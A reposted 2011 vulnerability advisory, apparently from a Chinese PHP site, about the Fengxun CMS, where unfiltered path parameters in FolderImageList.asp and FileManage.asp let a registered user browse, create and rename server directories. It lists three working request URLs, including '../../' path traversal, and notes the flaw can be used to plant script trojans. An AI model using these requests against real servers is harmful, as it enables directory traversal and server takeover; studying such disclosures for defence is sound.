文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>风讯浏览目录创建文件漏洞

风讯浏览目录创建文件漏洞

时间:2011-05-10  来源:坏人咖啡

发布日期:2011-05.10
发布作者:坏人咖啡

漏洞类型:设计错误
漏洞描述:通过测试发现该程序FolderImageList.asp FolderImageList.asp FileManage.asp 几个脚本程序在处理用户提交的恶意路径参数时没有进行控制过滤,导致攻击者可以进行服务器目前查看,创建等操作,恶意攻击者可以利用该缺陷进行脚本木马的创建利用,导致服务器被控制。

 

详细说明:先注册用户名登录我后执行下边的命令就可以了

1 游览目录文件
http://192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/admin/

2 创建一个目录
http://192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/123456/

3 修改一个目录名称
http://192.168.1.62/User/FileManage.asp?Type=FolderReName&OldFileName=../../123456&NewFileName=654321


 

标签分类:

相关阅读 更多 +
排行榜 更多 +
侏罗纪狩猎

侏罗纪狩猎

飞行射击 下载
射击瓶子

射击瓶子

飞行射击 下载
水上乐园滑行大作战最新版

水上乐园滑行大作战最新版

休闲益智 下载